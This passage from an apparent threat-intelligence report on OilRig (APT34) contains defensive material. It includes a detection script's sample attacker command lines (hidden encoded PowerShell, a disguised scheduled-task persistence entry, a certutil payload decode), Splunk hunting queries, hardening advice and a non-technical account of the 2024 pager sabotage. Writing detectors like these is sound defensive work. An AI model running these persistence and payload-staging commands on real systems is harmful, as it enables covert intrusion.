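SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -W Hidden -enc {SAMPLE_B64}",
    r'schtasks.exe /create /sc onlogon /tn MSOfficeLicenseCheck /tr "wscript.exe C:\Users\Public\Libraries\LicenseCheck.vbs"',
    r"certutil.exe -decode C:\ProgramData\stage.b64 C:\ProgramData\stage.ps1",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",  # no rule should fire
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print([rule for rule, _ in triage(line)], "<-", line[:60])
```

Decoding the payload at triage time is the step that turns the broad "-enc was used" signal into something an analyst can act on: encoded commands are also produced by legitimate management tooling, so the decision should rest on what the script does, which is why the cradle check runs against the decoded text.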

Table 4: Sample Threat Hunting Queries for Detecting OilRig TTPs

| TTP | Detection Logic/Hypothesis | Sample Query (Splunk/Sysmon) |
|---|---|---|
| Abuse of Password Filter DLLs | An unauthorized process has modified the LSA Notification Packages registry key to add a malicious DLL. | `index=winevents sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=13 TargetObject="*\Control\Lsa\Notification Packages" \| where Details!="scecli"` |
| PowerShell Obfuscation | PowerShell is being executed with an encoded command, a common method for hiding malicious scripts. | `index=winevents sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (Image="*\powershell.exe" OR ParentImage="*\powershell.exe") CommandLine IN ("*-enc*", "*-encodedcommand*", "*-e*") \| table _time, host, user, ParentImage, Image, CommandLine` |
| Persistence via Scheduled Task | The native scheduled task utility is being used to schedule the execution of a script file. | `index=winevents sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 Image="*\schtasks.exe" CommandLine="*/create*" AND (CommandLine="*.ps1*" OR CommandLine="*.vbs*") \| table _time, host, user, CommandLine` |
| EWS Backdoor Activity | A non-standard process is making network connections typical of EWS traffic (HTTPS to an Exchange server). | `index=sysmon EventCode=3 Protocol=tcp DestinationPort=443 \| join host, ProcessGuid [search index=sysmon EventCode=1]` |

Strategic Mitigation and Recommendations

Identity and Access Management (IAM)

  • Enforce Ubiquitous MFA: The Taldor breach was fundamentally an identity-based failure. The effectiveness of stolen or phished credentials is dramatically reduced if Multi-Factor Authentication (MFA) is enforced on all externally accessible services (e.g., VPN, Outlook Web Access, Citrix) and, critically, for all privileged account access, both on-premises and in the cloud.
  • Implement Privileged Access Management (PAM): Deploy PAM solutions to vault, manage, and rotate credentials for all privileged accounts, including Domain Administrators and MSP technician accounts. This limits the time window an attacker can use a stolen credential and provides a clear audit trail for all privileged sessions.
  • Monitor for Credential Abuse: Implement User and Entity Behavior Analytics (UEBA) to detect anomalous logon activity. This includes monitoring for impossible travel scenarios, logons from unfamiliar geolocations or IP ranges, and concurrent sessions from different locations.

Supply Chain and Vendor Risk Management

  • Adopt a Zero Trust Architecture for MSPs: All network traffic and access attempts originating from MSPs and other trusted third parties should be treated as untrusted by default. Enforce strict, least-privilege access controls and monitor their activity within the network as rigorously as any other user. Do not extend implicit trust based on the source of the connection.
  • Enforce Network Segmentation: As the Taldor analysis highlights, robust network segmentation is crucial to containing a breach. Prevent lateral movement by segmenting networks to isolate critical production environments from corporate user networks and third-party connection enclaves. An attacker who compromises an MSP should not be able to move freely into sensitive data repositories.

System and Application Hardening

  • Secure Microsoft Exchange: Given OilRig’s demonstrated abuse of EWS, Exchange servers must be hardened. Restrict EWS access to only the users and applications that absolutely require it. Regularly audit accounts with powerful permissions like Application Impersonation. Closely monitor mail flow rules for unauthorized changes and analyze outbound email traffic for anomalies.
  • Implement PowerShell Security Controls: Mitigate the risk of malicious PowerShell usage by implementing Constrained Language Mode where full language capabilities are not required. Enable and forward PowerShell Script Block Logging and Module Logging to a central SIEM for analysis. Use application control technologies like Windows Defender Application Control or AppLocker to restrict which users and systems are permitted to execute PowerShell scripts.
  • Maintain Rigorous Patch Management: While many of OilRig’s TTPs abuse legitimate features, they continue to exploit known vulnerabilities for initial access and privilege escalation. Maintain a rigorous and timely patch management program for all operating systems and third-party applications, prioritizing public-facing systems.

Intelligence Clarification: The Hezbollah Pager and Walkie-Talkie Incident

Nature of the Event

The incidents that occurred on September 17 and 18, 2024, involving the mass detonation of handheld pagers and walkie-talkies used by Hezbollah operatives across Lebanon and Syria, were a sophisticated physical supply chain sabotage operation. This event was not a network-based cyberattack in the conventional sense.

Methodology

  • Compromise Point: The compromise did not occur over a network but during the physical manufacturing or distribution phase of the devices. Reports indicate that the targeted Gold Apollo AR-924 pagers were compromised before they were ever delivered to Hezbollah.
  • Payload: The “payload” was not malicious software but a physical one. Tiny quantities of the plastic explosive PETN were meticulously integrated into the devices’ components, likely within the battery packs, making them virtually undetectable through casual inspection.
  • Trigger Mechanism: The thousands of compromised devices were triggered to detonate simultaneously or in coordinated waves via a remote signal, resulting in widespread casualties and sowing chaos and distrust within the organization’s communication infrastructure.

Contrasting Physical Sabotage with Cyber Espionage

It is critically important for cybersecurity professionals to understand the fundamental distinction between these two types of operations, as the defensive measures required are entirely different. The media and public discourse often use “cyberattack” as a catch-all term for any technologically sophisticated attack, leading to confusion.

The operational doctrine of OilRig, as detailed in this report, is centered on network intrusion. Their TTPs involve phishing, malware deployment, command and control over network protocols (DNS, EWS), and the logical exfiltration of data. Defense against OilRig involves network security monitoring, firewalls, EDR, SIEM, and robust IAM controls.

In contrast, the pager attack’s methodology involved physical access and hardware tampering. Its TTPs included logistics infiltration, covert modification of hardware, and physical emplacement of explosives. Defense against this class of threat falls under the domains of supply chain security, hardware vetting, counter-intelligence, and physical security.

Conclusion for Security Operations

While the Taldor breach and the Hezbollah pager incident are geopolitically related within the broader context of the Iran-Israel conflict, the pager attack falls outside the typical purview and defensive responsibilities of a corporate or government SOC. It represents a different class of threat that is managed through national security, physical security, and supply chain risk management programs, not with network security tools. This report’s focus remains on the tangible, network-based threat posed by OilRig (APT34) operating under the “Nasir Security” persona, which is the relevant and actionable threat for the cybersecurity community.